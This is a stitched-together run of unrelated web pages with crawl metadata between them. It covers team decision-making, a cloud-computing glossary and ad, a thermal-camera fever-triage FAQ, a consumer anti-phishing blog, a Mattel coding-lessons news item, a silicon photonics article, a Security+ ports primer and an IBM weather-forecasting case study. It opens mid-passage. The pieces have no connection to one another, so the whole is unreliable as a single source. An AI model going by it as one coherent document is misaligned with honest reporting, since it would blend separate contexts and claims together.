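Those probability-weighted statements can be compared directly as expected durations. In the sketch below, the fallback figures (what each estimate degrades to if the optimistic case does not hold) and the Java confidence level are invented purely for illustration:

```python
def expected_weeks(optimistic, fallback, p_optimistic):
    """Probability-weighted duration estimate in weeks."""
    return p_optimistic * optimistic + (1 - p_optimistic) * fallback

# Python: 1 week if the 50%-confident estimate holds; assume ~8 weeks
# otherwise, once rewrites and the learning curve bite (hypothetical).
python_weeks = expected_weeks(1, 8, 0.5)   # 4.5

# Java: the team is nearly certain about the two-month (~8-week) estimate.
java_weeks = expected_weeks(8, 10, 0.9)    # 8.2

print(python_weeks, java_weeks)
```

Even with generous uncertainty on the Python side, the expected duration can still come out well ahead, which is exactly the kind of insight a bare pros-and-cons list hides.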
What happens quite often in projects is that the team reaches no fact-based decision. If the advantages and disadvantages of choosing A or B were indisputable, the question would not even come up. The problems of picking one option lie either in different estimations of costs, risks, and side effects or in long-term versus short-term impact.
We must resolve that somehow. Listing the pros and cons for both options takes a day, usually accomplishing nothing of substance. So, we try diving one level deeper to figure out why people have different points of view. Maybe lack of knowledge on one side or the other? Different assumptions or understandings? Another five days spent dealing with those questions. As this seems to be a fifty/fifty decision, maybe adding product management's thoughts about the long-term perspective will bring the team towards a decision? This only serves to involve more people that have to be aligned in the end, which makes reaching a decision even harder. In this case, the smarter move would be to make an arbitrary decision and just start working instead of agonizing over the decision and accomplishing nothing. Just imagine: a lion is chasing us, should we take the left or right path? Someone says, "Follow me, we'll take the left one!" Would you really question the decision and wait around to be eaten? Realizing the potential this approach has takes guts on the development manager's side.
Unfortunately, no matter what you choose, people will find something to criticize. If you go with Python in the above example, after the project is finished, some people will inevitably say that they were right all along: With Python, it was harder to implement enterprise-grade software, the code was rewritten multiple times because of lack of experience, and with Java, none of that would have happened. Had the decision been Java instead, other people would have pointed out that the same code could have been written in Python within days instead of weeks due to the powerful data science libraries.
There is no definitive proof if the decision you didn’t make truly would have been the better one. That is why assigning a probability factor to statements often helps.
What is the solution to all the problems I laid out? Drum roll, please: There is none. Every project is different. People are different.
Scrum (agile development), if used properly, is a wonderful tool for software development. The rest is leading the team by example and being aware of the pitfalls. Most important, however, is a small team size for each individual component that has to be built.
Cloud computing has become an integral part of many organizations. But what do the solution architects, software developers and business users need to understand about this technical topic?
This article aims to provide you a better understanding of some important enterprise cloud computing application terms.
Cloud computing application (cloud app)
A cloud app is a program that is hosted in the cloud, possessing characteristics of both desktop and web applications. Most cloud apps are easy to access since they work both online and offline, and they can be updated anytime, anywhere.
Cloud Application Performance Management
Cloud APM, or CAPM, maintains the performance of applications running in hybrid and private cloud environments. Acting as the champion for organizations that are using cloud applications, CAPM monitors and manages the applications and the resources they are running on to make sure everything works properly.
CAPM tools help the organizations identify a poor user experience and quickly resolve any issues. Some tools even have the capability to alert IT administrators where a problem may potentially arise, or the ability to automate a solution for an ongoing issue.
Virtual Private Cloud
A virtual private cloud is a private cloud existing in a service provider’s public cloud environment. It has the capability to securely transfer data between a private enterprise and a public cloud service provider. This task is made possible through strict application of security policies such as tunneling, encryption, private IP address, and allocation of a unique VLAN to each customer.
Application Migration

Application migration refers to the process of transferring an application from one environment to another. The migration is either from an on-premise server to the cloud or from one cloud environment to another.
Migrating applications can be a daunting task because hosting platforms have their own unique characteristics. Some factors that can affect the migration include the different architecture, management tools, operating systems, and storage system in the environment where the applications were deployed. In addition, not all apps were designed to be portable.
Cloud Application Management for Platforms
CAMP plays an important role in improving the cloud's interoperability as well as simplifying the management of its apps. Its primary objective is to define the program interfaces and the items offered by a platform-as-a-service (PaaS) cloud provider.
The CAMP specification is submitted to the Organization for the Advancement of Structured Information Standards (OASIS). The group creates a standard program interface that makes it easier for many enterprises to work in several cloud environments.
Need help with your cloud computing infrastructure, database as a service (DaaS), software as a service (SaaS) or Oracle Cloud Database? Contact Four Cornerstone now! We have a team of experts who can help you leverage your cloud computing and Oracle investments. We also offer Oracle and Oracle MySQL consultation services, Oracle Linux and OVM support, and Oracle software licensing and hardware resell. Our extended solutions include the ones for Fusion Middleware and enterprise business intelligence. You can reach us by going to our online contact page or calling us at 817-377-1144.
What are thermal cameras?
A thermal camera is a camera that creates images using infrared radiation instead of visible light. The capture and analysis of the data they provide is called thermography.
Can all thermal cameras be used to calculate temperature?
No. To measure temperature, a thermal camera must also support radiometry. Thermal cameras that do not support radiometry can only detect temperature changes.
Can a thermal radiometric camera identify COVID-19 cases?
No. At best, it can identify humans whose surface (or skin) temperature is higher than a certain threshold. Although an elevated surface temperature might indicate the presence of a fever, further medical testing is required to confirm an elevated body temperature. Because surface temperature fluctuates more readily than body temperature and is susceptible to change based on a person’s surroundings, it is not an accurate indication of a person’s core temperature. In addition, to measure surface temperature accurately, the camera needs to be correctly calibrated before initial use, and then re-calibrated daily.
In the USA, devices used for such use cases need to be cleared by the FDA to be legally marketed. Thermal cameras could be used to triage people that would then require further analysis. Claiming otherwise could be deemed illegal.
Which thermal cameras are approved by the FDA?
Only a small number of devices are currently cleared by the FDA. These include FLIR devices that belong to their Instruments portfolio and lack the proper interfaces to be integrated with Security Center.
Some manufacturers are making aggressive claims about their equipment's capabilities. How do I distinguish fact from fiction?
We have seen a lot of unrealistic marketing material lately and this is a concern for Genetec Inc.
Beware of companies that claim that their equipment can detect fever, or that they can function properly outdoors or in a crowded environment. Accurate measurements require controlled ambient conditions and a controlled flow of people passing in front of the camera while looking at it. In any case, Security Center is an open platform and we are always looking to work with reputable manufacturers.
What camera manufacturers and models can currently be used to do a triage within Security Center?
There are currently two camera manufacturers: Mobotix and Axis.
We recommend using the Mobotix M16-Thermal-TR or S16-Thermal-TR series and configuring the cameras to generate events when they detect a temperature higher than 38°C (100.4°F). Security Center can receive custom thermal events generated by these cameras.
Axis Thermal Camera Q2901-E, using the HTC (Human Temperature Control) ACAP (Axis Camera Application Platform)
This ACAP is developed by an Axis technology partner, Grekkom, and it can be used to detect elevated skin surface temperatures. In evaluating this camera as a possible solution, consider the following statement from the AXIS website:
Under specific conditions, some Axis thermal cameras are capable of precise temperature measurements, but they are not designed by Axis for the specific intention of human fever detection nor the diagnosis, mitigation or prevention of disease or health conditions. Thus, Axis thermal cameras are, for example, not approved by FDA in the US for this use.
Do I need a special license in Security Center for thermal cameras?
No. Thermal cameras use a regular camera connection license in Security Center.
How do I set up a thermal camera as a triage device?
Recommendations vary among camera manufacturers. We recommend following these general guidelines to best prepare you for a typical installation.
- Set up a checkpoint, using a physical gate or turnstile, so that the person is forced to stop in front of the thermal camera for a few seconds. This way the camera can correctly measure the temperature.
- Make sure that people pass in front of the camera one at a time.
- The person whose temperature is being measured needs to be approximately 1 m (3.28 ft.) away from the camera.
- The camera needs to be installed indoors so that the ambient temperature and humidity can be controlled.
- To help ensure ambient temperature, we recommend not to install the camera close to a door.
- For accurate results, point the camera to a person's forehead when measuring their temperature. All headgear must be removed.
- Know that human body emissivity is approximately 98%. You need this emissivity reading when calibrating your thermal cameras (see the sketch after this list).
- The event threshold should be higher than 38°C (100.4°F).
- People that trigger an alarm should be tested further, using FDA-approved equipment.
- Calibrate the thermal camera daily.
- When calibrating the camera, remove any nearby objects that can negatively affect the calibration (for example, a hot drink).
- Always use the latest firmware available for the camera. Doing so increases the chances of getting accurate results.
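To illustrate why the emissivity figure matters, here is a simplified radiometric correction based on the Stefan-Boltzmann T^4 law. It ignores atmospheric transmission and the sensor's spectral response, so treat it as a teaching sketch rather than a substitute for the camera's own calibration routine:

```python
def corrected_object_temp_k(measured_k, reflected_ambient_k, emissivity=0.98):
    """Single-point emissivity correction for a radiometric reading.

    measured_k: apparent (blackbody-equivalent) temperature from the sensor
    reflected_ambient_k: temperature of the surroundings reflected by the skin
    """
    radiance = measured_k**4 - (1 - emissivity) * reflected_ambient_k**4
    return (radiance / emissivity) ** 0.25

# An apparent 309.5 K (36.35 C) reading in a 295 K room, at skin emissivity 0.98:
print(corrected_object_temp_k(309.5, 295.0) - 273.15)  # roughly 36.6 C
```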
To learn more, watch this video about fever detection guidelines from our Genetec™ Podcast Series.
This week is National Consumer Protection week and as while there are many threats to our user data and personal information, there are also a multitude of ways we can protect ourselves. Some examples of best practices are:
- Using a credit card rather than a debit card - this prevents you from needing to enter a PIN in public where people can visually capture your input.
- Using Apple or Google Pay - these applications store your credit card so you do not need to physically access the card to use it.
- Using a unique PIN for debit cards - not reusing this PIN for unlocking cell phones or as voicemail codes, etc.
- Never sharing passwords, account access, and credit or debit cards with others.
There are other, more advanced threats to the security of your devices. It is important to be aware of them as this increases your ability to protect yourself from them.
It's Consumer Protection Week - Here's 4 Ways to be Safer Online
There are far more than four approaches to staying safe in an online environment, but these ideas can be implemented immediately. Most importantly, remember to slow down when you are feeling pressured. Hackers often use scare tactics to appeal to your emotional, and less rational, feelings to get you to act without thinking. If you stop and think about what is going on before reacting, you will be less likely to make a big mistake.
Reduce the amount you rely upon search
Search became the answer for all our woes years ago. Can't remember where you stored a file? Forgot the name of the file or when it was created? Can't figure out where a setting went? Not to worry, search to the rescue! The problem with using search this way is that it allows us to pay less attention to what we are doing. We rely upon, or anticipate using search later, which makes us lazier as we are confident search will provide what we need.
Where this can hurt us is relying upon search to find company websites. It would be challenging to find someone who has never experienced clicking on a website result only to find it was not what we were looking for. This is not a big deal when searching for a specific item not tied to a company. However, for banking and other websites that would need to collect personal information, this is much riskier. If you imagine the drive home from work and how easy it can be to forget part of the trip, this is what can happen when we use search all the time - we forget to stop and consider what we are clicking.
The fix: Bookmark the correct site instead of searching and absently clicking on results.
Don't click or call the number in popup warnings
Popup warnings are different from ads and website interactions like subscribing to a newsletter or signing up for a coupon. By contrast, these are the warnings claiming your computer has been infected and you need to call (enter the company here) so they can fix your computer. Oftentimes they pretend to be Microsoft or other reputable companies to encourage people to call. Unfortunately, these popups use shady scare tactics to convince people to let them connect remotely when you otherwise would not.
What is important to know is that a popup claiming you have been infected does not mean you actually are. In other words, a popup can claim anything, but that does not make it true. People who call are encouraged to allow the company to connect remotely so they can "clean their computer". At this point, typically one of two things happens. The user either overpays for software to remove malware that likely never existed in the first place, or, in the worst case, this is when the real malware is installed.
The fix: Close the web browser. If the popup returns, reset the browser to factory settings or if necessary, uninstall the browser and reinstall it.
Most importantly, do not ever let someone remotely connect to your computer unless you know who they are and trust them. Remote control software was created for a great purpose - to allow technicians to help people without physically being in the same location. It can also be used to run updates and install software when users are not actively on their computers, as is the most common case with businesses. Unfortunately, those settings that make it great for remote tech support also make it dangerous when misused.
Look for more than the lock symbol next to a website
This is important because we have all been taught to look for the lock symbol next to a website to be confident the site is encrypting our data before transferring it. Unfortunately, it is not enough for a website to have this symbol. The symbol means a security certificate has been purchased for the domain. However, it does not mean it is a trustworthy website or that it is safe to enter your information.
As an example, Wells Fargo's website is wellsfargo.com. If you were unknowingly redirected to wellsfargo.online.com and someone made this fake site look just like Wells Fargo's website, you might be tricked into entering your credentials. In situations like this, the lock symbol does not protect you because you are submitting your information directly to the hackers. While the lock does show the site is secure, if you are using the wrong site, your information is still at risk.
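For the curious, Python's standard library can show exactly what the lock represents. The snippet below (example.com is just a stand-in host) retrieves a site's certificate and prints which domain it was issued to; a phishing domain can present an equally valid certificate for itself, which is why the lock alone proves nothing about trustworthiness:

```python
import socket
import ssl

HOST = "example.com"  # stand-in for whatever site you are checking

ctx = ssl.create_default_context()
with ctx.wrap_socket(socket.create_connection((HOST, 443)),
                     server_hostname=HOST) as tls:
    cert = tls.getpeercert()

# The certificate's subject names the domain it actually covers.
print(dict(item[0] for item in cert["subject"]))
```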
The fix: Always be sure to check the URL before entering your credentials. This is especially important when using search or clicking on links in email, which I recommend doing cautiously. It is easy to be redirected without realizing it. Checking the URL in its entirety gives you the best chance of never falling for this trick.
Go directly to a site rather than clicking on a link in an email
Last but not least, clicking on links in emails can be very risky. There are examples of emails with safe links including, but not limited to:
- Newsletters you have subscribed to and trust
- Emails received after clicking a link on a website to reset a password or recover an account
- Deals or product information emails from companies you trust and that you actively signed up to receive
Aside from emails you are expecting or have consented to receive, use caution clicking on links. This is especially true of threatening emails or emails using scare tactics like you need to change your password because there was a data breach, etc. Keep in mind, a link's text can be anything and the destination link might not match the text.
A hyperlink contains two parts: the text describing the link and the actual link destination. The text may look like this: "Check out our sale now!" and appear to have come from a company you subscribe to, but the hyperlink could be pointing to a nefarious website hoping to gather your personal data.
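For the technically curious, the mismatch is easy to see in a page's raw HTML. This sketch uses only Python's standard library, and the phishing-style link at the bottom is made up; it prints each link's visible text next to its real destination:

```python
from html.parser import HTMLParser

class LinkAuditor(HTMLParser):
    """Print each link's visible text alongside its actual destination."""

    def __init__(self):
        super().__init__()
        self.href, self.text = None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.href = dict(attrs).get("href")

    def handle_data(self, data):
        if self.href is not None:
            self.text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self.href is not None:
            print(f'text: {"".join(self.text).strip()!r} -> goes to: {self.href}')
            self.href, self.text = None, []

# Friendly-looking text, unrelated destination -- the classic trick.
LinkAuditor().feed(
    '<a href="http://wellsfargo.online.example/login">Check your account now!</a>'
)
```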
The fix: Hover over the link to see where the link is really going. Instead of using the link, go to the site directly or call the company to see if there really is a problem with your account. The more we notify companies of scams like this, the better they can inform other customers and the safer we will all be.
During the National Consumer Protection Week, and every week, it is important to do your best to protect yourself. Going directly to websites rather than using search, checking to make sure you are at the correct website before entering your credentials, refusing to click on ads using scare tactics and using caution with links in emails are ways you can protect yourself from common attacks schemes happening all the time.
As always, knowing what form an attack may take will better help you identify the risks so you can avoid them rather than becoming a victim! | <urn:uuid:c648115c-f18b-4b22-8e7e-d9dcd68654c1> | CC-MAIN-2022-40 | https://blogs.eyonic.com/its-consumer-protection-week-heres-4-ways-to-be-safer-online/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00587.warc.gz | en | 0.952107 | 1,536 | 2.671875 | 3 |
Toy company Mattel has partnered with Tynker, a computing platform, to bring coding to 10 million children internationally by 2020, according to a company announcement. The companies plan to introduce seven Barbie coding lessons to inspire young girls to look at careers as a pet vet, astronaut or robotics engineer.
The two companies formerly partnered in 2015 with the Hot Wheels and Monster High "programing experiences," which were brought to nearly 4 million kids.
The company is hoping to connect kids to coding "through Mattel characters they know and love," which could then help ignite a desire to pursue a more technically-based career, according to Sven Gerjets, CTO of Mattel.
Female representation in the technical workforce is dismal, particularly in cybersecurity. A mere 11% of the cybersecurity workforce is women, and companies like Mattel and Tynker are taking notice.
Exposing young children to a skill that is rapidly growing is pertinent to maintaining a healthy future workforce. Finding the right kind of leverage, whether it be through Girl Scout badges or Barbie, is also critical.
A combination of education and marketing is key in creating an inviting perception of IT. Currently, a lack of female representation in the technical workforce is one of the deterrents for young women pursuing a path in tech despite 62% of young women regarding those in the field as "highly intelligent."
Even with noted female representation, 60% of young women say they don't have enough experience in coding and therefore have a natural resistance to the field. If a toy or children's company like Mattel were to continue initiating programs that intertwine the love of childhood characters with skills needed in the 21st century, a natural interest would arise.
If a Shamu-trainer Barbie can inspire a child to swim with a killer whale, a coding Barbie can certainly create a similar desire for tech.
By Tom Williams | Posted on January 15, 2018
After years of future promise, silicon photonics (SiPh) technology is ready for prime time — having made the transition from promise to production. With an increasing demand for more network capacity, cloud, content, and service providers want optical modules that reduce power, size, and cost. SiPh is now being used in a wide range of coherent optical interfaces, from metro and long haul to submarine data transport, to enable high-density form factors and excellent performance.
Silicon photonics can enable reduced development time, higher levels of integration, and fewer manual assembly steps than more traditional optics. The result? A powerful, easier-to-manage product that empowers cloud, content, and service providers to stay ahead of increases in network capacity demand.
Silicon-based photonic integrated circuits (PICs), which integrate all the high-speed optics necessary for both transmit and receive functionality, enable the density required for pluggable coherent modules. These PICs include the optical polarization-controlling functions that may require external components when implemented in Indium Phosphide (InP). By reducing the number of active alignment steps, SiPh-based products improve yield and ramp more efficiently.
While metro applications served as the primary market for SiPh’s initial service provider network implementations, SiPh is used in long-haul — even submarine — applications today. The submarine market has always required high-performance technology, even if it came at higher price points. Combining SiPh with high-performance digital signal processing (DSP) technology enables submarine-network performance equal to or better than the more expensive, discrete component-based approaches (Figure 1).
Figure 1. The coherent SiPh PIC reduces cost and size versus the use of more expensive, discrete components.
That said, InP technology remains important for laser functionality. But separating that laser function from the high-speed optics can produce several benefits. For example, InP generally requires thermo-electric coolers (TECs) to maintain tight temperature stability. SiPh, on the other hand, can operate over a wide temperature range with no impact on performance. The high-speed interface is optimized by putting the optics close to the DSP and moving the laser further from the DSP, where the TEC doesn’t have to work as hard to maintain constant chip temperature.
Silicon photonics provides further benefits
Using SiPh in coherent applications creates products with rich feature sets that offer high density and pluggability.
There are a number of reasons why SiPh has proven well suited for many applications, including coherent optics:
- Yield: Beyond improving manufacturing costs, high yield reduces development time by limiting the number of variables during prototyping. When working with low-yield optics technologies, it is difficult to determine if performance limitations derive from design defects or process variation. At higher levels of integration, this uncertainty is compounded. When developing complex PICs with many integrated functions, it is imperative to know that the individual building blocks are well understood and repeatable. These attributes enable the designers to focus on optimizing the interfaces between each function.
- Polarization Control: Coherent transmission increases the data rate via polarization multiplexing – two orthogonal polarizations are transmitted simultaneously at the same wavelength. This approach requires transmit and receive components that can manipulate the polarization state of an optical signal. When working with InP, polarization control is usually done using external components. Not only do these extra components increase material cost, they also add extra alignment steps that integration of these polarization control functions in the SiPh PIC can eliminate.
- Thermal Operating Range: As mentioned previously, InP components are sensitive to temperature variation and must be mounted on a TEC. Since TECs have a limited control range, they fundamentally limit the operating temperature range of InP components. In addition, TECs consume significant power in cooling mode, where the thermal design is most challenging. By comparison, the optical characteristics of SiPh vary little over temperature. SiPh doesn’t require a TEC and supports a wide operating temperature range.
- Humidity: Traditional optics degrade in high-moisture environments. For this reason, optics are packaged in vacuum-sealed gold boxes. These hermetic gold boxes contribute significantly to the cost of optical interconnects, particularly when they require high-speed interfaces. In addition, hermetic seals are historically one of the most common sources of failure for optics. Silicon is well known to be insensitive to humidity. Millions of silicon electronic components are shipped every year in non-hermetic plastic packages; moving optics to non-hermetic packaging is an important step for the industry.
- Wafer Level Testing: In addition to having higher yields than traditional optics materials, SiPh can also be tested at the wafer level. Good die can be identified early in the process, and there is no labor wasted on material that will ultimately fail. Wafer-level test is commonplace in high-volume electronics applications, but new to the world of optics.
- Wafer Size: Leveraging mature silicon process technologies means that much larger wafers can be made in silicon than traditional optics materials. Three-inch wafers are state of the art for InP fabs. Today’s SiPh runs on lines that accommodate 8-inch wafers or larger. These larger wafers result in an order of magnitude more die per wafer, which lowers cost.
- Package Level Integration: As the industry continues to move toward higher data rates and lower power, the interface between the DSP and optics is quickly becoming a bottleneck. Every time a high-speed signal needs to transition across an additional interface (IC package or pluggable connector) there is loss and distortion. Compensating for this additional loss adds power dissipation, and distortion limits performance. Using SiPh enables package-level integration that can better optimize these high-speed interfaces and accelerate the realization of higher data rates at lower power.
Leveraging silicon photonics
Understanding SiPh’s benefits, how do we best use them to drive innovation? Today’s optics architecture is optimized for client interfaces in which the laser is directly modulated. This model is easily extrapolated to external modulation when the modulator technology has the same thermal and packaging limitations as the laser. Thermally sensitive components that need a TEC to maintain a constant temperature are unlikely to be integrated with a DSP chip that also dissipates power.
On the other hand, when working with SiPh, designers can optimize the high-speed interface and separate the thermally sensitive laser. For example, the laser can be placed on another part of the line card and connected to the high-speed optics through an optical fiber. This architecture enables greater thermal flexibility, a high-speed signal path with superior signal integrity, and elimination of costly hermetic packages with high-speed interfaces (see Figure 2).
Figure 2. High-speed electro-optical package integration.
SiPh and coherent are two technologies shifting the landscape of optical communications in parallel. By moving to architectures that can optimize the benefits of each, it can be possible to have the same kind of impact on access networks as we have already seen in applications from the metro core through to submarine. Using a toolbox that includes SiPh and coherent DSP technology, designers can leverage complicated modulation formats, high baud rate, and highly integrated parallel optics to optimize designs for a wide range of applications.
Ball Grid Array Packaging Technology
The transition to low-cost packaging and standard interfacing is an important next step to further the benefits of SiPh technology. As the industry moves toward 600-Gbps capacity per wavelength using higher baud rate and higher order modulation formats, traditional packaging technology can limit performance of the interface between the DSP and optics. Ball grid array (BGA) packages address this challenge by eliminating additional connectors and optical package leads, improving bandwidth and signal integrity.
Here and now
SiPh is no longer a technology of the future. Coherent modules based on highly integrated SiPh PIC technology have been deployed in applications ranging from data center interconnects to submarines. In the next phase of maturity, the industry is learning to understand how to best leverage the benefits of SiPh to achieve the pace of innovation necessary for optical networking to meet the worldwide data traffic demands that such applications as cloud computing, 5G, and the Internet of Things will drive.
Tom Williams is Senior Director of marketing at Acacia Communications. Before joining Acacia, Williams spent 14 years at Finisar Corp. (initially with Optium, which Finisar acquired in 2008), where he was director of product line management for coherent and direct detect transport products above 100 Gbps. He has also held positions at Lucent Technologies and Northrop Grumman Corp. He has an MS in electrical engineering from Johns Hopkins University and BS degrees in electrical engineering and physics from Widener University.
If you're planning to take the Security+ exam, you should have a basic understanding of commonly used ports. Port questions continue to appear on the Security+ exam.
There are 65,536 TCP ports and 65,536 UDP ports. The first 1,024 (0 to 1023) are well-known ports, commonly used with default protocols. For example, the default port for HTTP is port 80 and the default port for HTTPS is 443.
Understanding Port Usage
Here’s a short explanation of how the ports were used when you accessed this Web page. When you clicked a link for the blog, your computer created the request and put it into a packet with source and destination IP addresses and ports. The IP address of GetCertifiedGetAhead.Com (the destination) is 220.127.116.11 and since HTTP is used, the destination port is 80.
Your computer then identified an unused port in the dynamic and private port range (49,152 to 65,535) and mapped it to your Web browser for this request. For this explanation, imagine that it picked 49,152. Additionally, imagine that your computer (the source) has an IP address of 18.104.22.168. Here’s what we have:
- Destination IP: 220.127.116.11 (the GetCertifiedGetAhead.Com server)
- Destination Port: 80
- Source IP: 18.104.22.168 (the client's system)
- Source Port: 49152
Another way of looking at the destination port from the client's perspective is that it is an outgoing port. If you want to block outgoing HTTP traffic, you can block outgoing port 80 at your network firewall. On the other hand, that same port is an incoming port from the server's perspective. If you want to block incoming HTTP traffic, you can block incoming port 80.
TCP/IP then used the destination IP to get the packet to the GetCertifiedGetAhead.Com Web server. When the server received the packet, it looked at the destination port (80) and sent the packet to the service handling the HTTP protocol (the Web server application).
The Web server formatted the Web page, and sent it back to your computer. In this case, the destination IP addresses and ports are swapped and would look like this:
- Destination IP: 18.104.22.168 (the client's system)
- Destination Port: 49152
- Source IP: 220.127.116.11 (the GetCertifiedGetAhead.Com server)
- Source Port: 80
TCP/IP used the destination IP to get the packet back to your system. When the packet arrived, your system looked at the destination port and saw that it is mapped to your Web browser. It then forwarded the packet to your Web browser to display. Of course, the Web page may have been sent in several packets, but each packet used the same process.
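You can watch this port assignment happen using Python's standard library. The sketch below opens a TCP connection to a web server (example.com is purely a stand-in host) and prints the ephemeral source port the operating system picked alongside the well-known destination port:

```python
import socket

# Connect to a web server on the well-known HTTP port.
conn = socket.create_connection(("example.com", 80))

local_ip, local_port = conn.getsockname()    # source side: ephemeral port
remote_ip, remote_port = conn.getpeername()  # destination side: port 80

print(f"source      {local_ip}:{local_port}")    # port from the dynamic range
print(f"destination {remote_ip}:{remote_port}")  # always 80 for this connection
conn.close()
```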
Know These Security+ Ports
Ports are used the same way for multiple services. Some of the common ports you should know are:

- FTP: TCP 20 and 21
- SSH (and SCP/SFTP): TCP 22
- Telnet: TCP 23
- SMTP: TCP 25
- DNS: TCP/UDP 53
- TFTP: UDP 69
- HTTP: TCP 80
- Kerberos: TCP/UDP 88
- POP3: TCP 110
- NTP: UDP 123
- IMAP4: TCP 143
- SNMP: UDP 161 (and 162 for traps)
- LDAP: TCP 389
- HTTPS: TCP 443
- RDP: TCP 3389
Remember, you can memorize these ports and then write them down as you start the test. If you get any port questions, you only need to look down at your notes to answer the question.
Here’s another link on Security+ ports that breaks down the ports in different categories and also identifies if they use TCP or UDP.
Other Security+ Study Resources
- Security+ blogs organized by categories
- Security+ blogs with free practice test questions
- Security+ blogs on new performance-based questions
- Mobile Apps: Apps for mobile devices running iOS or Android
- Audio Files: Learn by listening with over 6 hours of audio on Security+ topics
- Flashcards: 494 Security+ glossary flashcards, 222 Security+ acronyms flashcards and 223 Remember This slides
- Quality Practice Test Questions: Over 300 quality Security+ practice test questions with full explanations
- Full Security+ Study Packages: Quality practice test questions, audio, and Flashcards | <urn:uuid:56f5f53d-b742-41ce-9600-3512f6b0b1a3> | CC-MAIN-2022-40 | https://blogs.getcertifiedgetahead.com/understanding-ports-security-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00787.warc.gz | en | 0.887965 | 850 | 3.21875 | 3 |
The challenge of predicting weather accurately
Weather forecasting in the United States and other developed nations is more accurate than in other more remote parts of the world. The Weather Company saw an opportunity to advance accurate weather predictions globally by leveraging the IBM GRAF.
The transformation of accurate weather forecasts
The Weather Company produces more precise and often more accurate weather forecasts by running higher resolution and more computationally intensive weather models on the latest technology that incorporates IBM Power System AC922 equipped with NVIDIA V100 GPUs.
IBM GRAF results
5xfaster running on IBM Power System AC922 with NVIDIA GPUs vs. x86-based servers
15 Hourweather predictions updated every 1 Hour
Increasingforecasting precision from 15km to 3km
Business challenge story
The art of weather forecasting
Weather affects every inhabitant on Earth, every day. It influences what people do, where people travel, what people eat, and even how people feel. More accurate weather forecasts help make more informed daily decisions and keep people out of danger.
In 2016, IBM acquired The Weather Company, a provider of hyperlocal weather forecasts. This acquisition brought together IBM’s powerful cognitive analytics capabilities and The Weather Company’s extremely high-volume data platform that ingests, processes, analyzes and distributes enormous data sets at scale in real time. Today, The Weather Company delivers around 25 billion forecasts daily and personalized weather data and insights accessible at your fingertips on various platforms like The Weather Channel app and weather.com. In addition, The Weather Company helps millions of consumers and businesses make better decisions as the leading provider of weather-driven business solutions to media, aviation, energy and utilities, insurance and government sectors.
The Weather Company, along with most meteorological services in the world, deploys numerical weather prediction (NWP) technology on supercomputers for weather forecasting. The Weather Company realized that with the addition of high-speed GPU technology they could accelerate weather prediction in order to generate global, high-resolution weather forecasts for the next 15 hours, updating those forecasts every hour. To achieve its goals of running more precise, complex and computationally intensive weather models, they required a supercomputer solution with ultimate speed and scale.
As Todd Hutchinson, head of Computational Meteorological Analysis and Prediction at The Weather Company, explained: “The Weather Company is looking to run the latest weather prediction models at high resolution over the entire world. Higher resolution gives more details in the forecast and resolves features that affect everyday weather, like thunderstorms, which are more difficult to forecast. To make this possible, The Weather Company needs computing capabilities that are cost effective from a capital, energy and data center footprint point-of-view to run these models which require significant computational resources.”
Transforming weather insights into actions
Redefining accurate weather predictions with IBM GRAF
The Weather Company was accustomed to running weather models on conventional x86-based clusters. Although, to continue raising the bar for weather predictions, they needed to build upon their 15+ years of regional weather modeling to expand towards global weather models. TWCo decided to implement the Model for Prediction Across Scales (MPAS) atmospheric model.
“Our goal is to improve our weather forecasts by running weather prediction models at higher resolution, more frequently, and globally. To do this, we are utilizing the hardware and software platforms that are available now from IBM and NVIDIA.” – Todd Hutchinson
Historically, weather models were developed on homogenous CPU-only systems, but as the industry embraces heterogeneous systems that take advantage of specialized accelerators to drive performance improvements, existing code needed to be ported over to GPUs to see those gains. These legacy codes and applications can be decades old, which created challenges in enabling them for GPUs. Since MPAS is a more recent model, some of these barriers were eliminated. By using OpenACC directives and other tools from PGI such as PCAST (PGI Compiler Assisted Software Testing) to diagnose and optimize MPAS, the team was able to successfully port all dynamics routines and an entire suite of physics parameterizations to enable acceleration of an entire weather forecast using GPUs.
To accelerate their capabilities, The Weather Company worked with IBM to design and purchase a high performance computing system based on IBM Power System AC922 servers. The Power System AC922 is the world’s best server for enterprise AI training, and the IBM POWER9 processor at the heart of the AC922 includes the industry’s only CPU-to-GPU NVIDIA NVLink interface, allowing the server to get up to 5.6x greater bandwidth between its incorporated NVIDIA V100 Tensor Core GPUs to deliver faster time to insights.
Todd Hutchinson: “Ultimately, there were a few reasons that we selected IBM Power Systems. First, while most weather models were built before the introduction of GPUs within supercomputing, the weather model that we’re working with (MPAS) is relatively new and was written by the National Center for Atmospheric Research (NCAR) using modern software standards. Researchers at the Computational Information Systems Laboratory at NCAR and the University of Wyoming were working to port MPAS to GPU using OpenACC. With additional support, they felt that they could port the entire weather model to GPU and gain a significant speedup as compared to running on CPU. With that effort ongoing between NCAR and The Weather Company and with the capability of GPUs on a cluster that IBM was able to build for us, it enabled us to move forward with IBM Power Systems.”
The results of having better weather data
Weather forecasting of the future
IBM Global High-Resolution Atmospheric Forecasting System (IBM GRAF)
In January 2019, TWCo revealed a new powerful global weather forecasting system would go live later in the year to provide the most precise local weather forecasts worldwide. The new IBM Global High-Resolution Atmospheric Forecasting System (IBM GRAF) will be the first hourly-updating weather system that is able to predict something as small as a thunderstorm anywhere on the planet. Compared to existing models, IBM GRAF will provide a 9x increase in forecast points across the world.
The new weather system, IBM GRAF, will become available Fall 2019. With the IBM Power System AC922 plus NVIDIA V100 GPUs, The Weather Company can make significantly more calculations within the weather model, and thus provide more frequent and accurate weather predictions globally, in locations that typically don’t have access to detailed forecasts.
As Todd Hutchinson mentioned, “While weather forecasting in some parts of the world such as the United States is quite accurate and timely, weather forecasting is often not nearly as precise or accurate in many other parts of the world. In most areas, weather models run at relatively coarse resolutions of 10-15km and update only once every 6 hours. Often, the latest weather forecast is based on information that is up to 10 hours old. With IBM GRAF, forecasts for most areas of the world will be fine-scale (3km resolution) and will be updated with the latest available data every hour. The benefits of IBM GRAF will be seen in the forecast for the coming 15 hours. So, for example in areas such as Africa, South America and much of Asia — in the morning we will have a much better opportunity to determine whether a particular location is likely to be affected by thunderstorms throughout the coming day.”
